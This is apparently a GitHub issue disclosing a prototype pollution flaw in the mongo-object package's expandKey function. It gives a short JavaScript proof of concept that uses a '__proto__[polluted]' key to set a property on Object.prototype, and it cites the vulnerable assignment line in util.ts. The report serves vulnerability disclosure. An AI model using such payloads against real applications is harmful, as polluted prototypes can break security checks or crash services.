Prototype Pollution in expandKey function

[cstimkong]

Describe the bug

Prototype Pollution vulnerability in the function expandKey (util.js)

To Reproduce

Use the following PoC:

var mo = require('mongo-object');
assert(({}).polluted === undefined);

mo.expandKey('yes', '__proto__[polluted]', {});
assert(({}).polluted === 'yes');

Expected behavior

The polluted field of Object.prototype should not be defined.

Desktop:

• OS: any
• Node: version 22

[github-actions]

Thank you for submitting an issue!

If this is a bug report, please be sure to include, at minimum, example code that will reproduce the issue. Even better, you can link to a saved online code editor example, where anyone can immediately run the code and see the issue.

If you are requesting a feature, it is better to discuss it in the Discussions area first.

If you need to edit your issue description, click the [...] and choose Edit.

Be patient. This is a free and freely licensed package that we maintain in our spare time. You may get a response in a day, but it could also take a month. If you benefit from this package and would like to see more time devoted to it, you can help by sponsoring.

[cstimkong]

Sink Location:

mongo-object/src/util.ts

Line 251 in 4f7a570

current[subkey] = val